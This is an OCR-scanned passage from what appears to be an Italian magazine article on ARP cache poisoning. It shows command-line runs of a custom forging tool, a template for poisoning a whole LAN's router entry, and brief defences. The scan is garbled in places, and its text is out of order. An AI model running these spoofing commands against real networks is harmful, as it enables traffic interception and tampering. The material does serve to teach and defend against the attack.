root@DigitalF:~# ping -e 1 192.168.1.2 

PING 192.168.1.2 (192.168.1.2): 56 octets data 
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— 192.168.1.2 ping statistics — 

1 packets transmitted, packets received, 100% packet 

loss 

root@DigitalF:~# 

tcpdump: 

20:08:02.816143 0:80:c8:7a:39:14 0:1 0:a4:c0:1 5:92 

0800 102: 192.168.1.154 > 192.168.1.2: icmp: echo re- 

quest 



» HRP Request 



Come volevasi dimostrare: in poche parole, abbiamo spoofato 
192.168.1.2 (che non esisteva all'inizio), non c'è reply perché il 
sistema operativo sa solo di essere .1 e non .2 Quindi il MAC è 
nostro e il dst IP è rimasto identico. Se guardate bene, si notano 
dei valori strani nella riga di comando. ..source mac 
aa:aa:aa:aa:aa:aa non combacia con 

00: 10:A4:C0: 15:92; questo avviene perché il kernel non effettua 
una verifica. Questo è soltato uno degli esempi possibili ma un at- 
tacker potrebbe fare molto altro falsificando i reply. Per fare un 
breve riassunto, diciamo che con gli ARP reply è possibile modifi- 
care la cache ARP, e inviare pacchetti broadcast senza che il tar- 
get ip venga controllato. 
A cosa ci serve mandare un ARP request? 

# ./arp ethO aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 

00:10:40:30:20:11 192.168.1.2 00:00:00:00:00:00 

192.168.1.8 10000000 

DELAY = 10000000 

SENT 

# 

ora vediamo la cache di DigitalF... 

root@DigitalF:~# arp -na 

(192.168.1.2) at 00:10:40:30:20:11 [ether] on ethO 
(192.168.1.1) at 00:1 0:A4:C0:1 5:92 [ether] on ethO 

root@DigitalF:~# 

Abbiamo nuovamente cambiato la cache per 192.168.1.2. 
Ma perché? guardiamo il protocollo... Gli arp request con- 
tengono il source ip e source mac di un host e il dst ip a cui 
viene inviata la richiesta. Perché non memorizzare in cache il 
source e dest mac dei request che riceviamo? Questo permet- 
terà di evitare di mandare un request per quel IP nel futuro. 
Infatti, questa procedura fa parte del protocollo. Un attacker 
potrebbe inserire informazioni false per memorizzare in cache 
ciò che più gli pare. Si noti come anche in questo caso il dst 
ip non viene controllato, e il pacchetto è broadcast. 



» Passibili attacchi 



Proviamo a mandare un request con un source ip che non sta 
già nella table (quindi effetivamente cerchiamo di creare un 
entry nell'arp table). 

# ./arp ethO aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 
00:10:40:30:20:11 192.168.1.4 00:00:00:00:00:00 



192.168.1.8 10000000 
DELAY = 10000000 
SENT 
# 

root@DigitalF:~# arp -na 

(192.168.1.1) at 00:1 0:A4:C0:1 5:92 [ether] on ethO 
root@DigitalF:~# 



Non succede nulla. Se però si prova con 
gitalF (.154) 



# ./arp ethO aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 

00:10:40:30:20:11 192.168.1.4 00:00:00:00:00:00 

192.168.1.154 10000000 

DELAY = 10000000 

SENT 

# 

root@DigitalF:~# arp -na 

(192.168.1.4) at 00:10:40:30:20:11 [ether] on ethO 
(192.168.1.1) at 00:1 0:A4:C0:1 5:92 [ether] on ethO 

root@DigitalF:~# 

Et voila! La voce è stata creata. Si noti che con arp reply non 
funziona mettendo il vero dst ip. Con dst ip 127.0.0.1, 
214.0.0.1 eccetera invece non funziona. 
Quindi il kernel controlla effettivamente il dst ip per creare una 
entry nel table, e non si può broadcastare. 
Al contrario, si possono benissimo broadcastare pacchetti che 
aggiornano la cache e creare entry in essa (quest'ultimo deve 
contenere il dst ip corretto, quindi non possiamo broadcastare 
quando creiamo entry). Per broadcast intendo che con un pac- 
chetto un attacker può passare indisturbato. 
Modificando la tabella di ARP un attaccante potrebbe ridirige- 
re tutto il traffico della rete sulla propria macchina, catturarlo, 
e poi inviarlo eventualmente alla vera destinazione. 
Supponiamo di avere due computer di una LAN, A e B, che 
hanno in cache il MAC address del router. Se questo viene mo- 
dificato, inserendo abusivamente il MAC address del computer 
C al suo posto, tutto il traffico destinato al router (tutto il traf- 
fico Internet in pratica) verrà dirottato su C. 
Che potrà a sua volta dirigerlo sul router o fare esso stesso da 
router, avendo però la possibilità di intercettare le comunica- 
zioni e alterare ogni pacchetto. 



jjj 





Per saperne di più 



■ Iteriori i riforma - 

I zioni tecniche sull'Address Resolution 
v fj Protocol possono essere trovate nelle RFC 
826 e 903, che si possono trovare un po' ovun- 
que su Internet, per esempio su 
www.faqs.org/rfcs/rfc826.html e 
www.faqs.org/rfcs/rfc903.html rispettivamente. 
Purtroppo non sono state ancora tradotte in ita- 
liano. 
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I 



viene aggiornata a ogni secondo, A e B non invieranno mai le 
richieste ARR Utilizzando request invece che reply, l'attacker pas- 
serà probabilmente inosservato, non essendoci tracce evidenti di 
un attacco. 

» Carne difendersi 



Tutto questo funziona solo all'interno di una LAN, ma è un attac- 
co molto efficace e da non sottovalutare. Tutti i computer della 
LAN sono vulnerabili a questo tipo di attacchi. Per di più, l'at- 
+ acco può essere portato anche da remoto se l'attacker en- 
tra nella LAN attraverso un tunnel VPN. Una prima con- 
tromisura di difesa è quella di impostare le entry ARP 
come statiche. La seconda è di monitorare gli ARf^ per 
esempio implementando controlli ai dst IR Ciò vuol dire 
che per ogni host della LAN che l'attacker vuole dirotta- 
re dovrà inviare un arp. Quindi se invia pacchetti a inter- 
valli di un secondo, per 100 host dovrà inviare 100 pac- 
chetti ARP al secondo invece che 1 . e quindi l'attacco dovreb- 
be essere più evidente, m 



Traffico dopo aver modificato la cache di ARP impo- 
stando il MAC Address di C sull'IP del router. 




in pratica: 

# ./arp ethO aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 1 MACNO- 
STRO IPROUTER 00:00:00:00:00:00 1.1.1.1 1000000 

Con questo pacchetto la cache di tutta la LAN si aggiornerà. Pro- 
babilmente, l'attaccante invierà il pacchetto molto frequentemen- 
te, magari a ogni secondo, tanto per essere sicuro che il router 
non mandi reply corretti o modifichi la cache. Siccome la cache 
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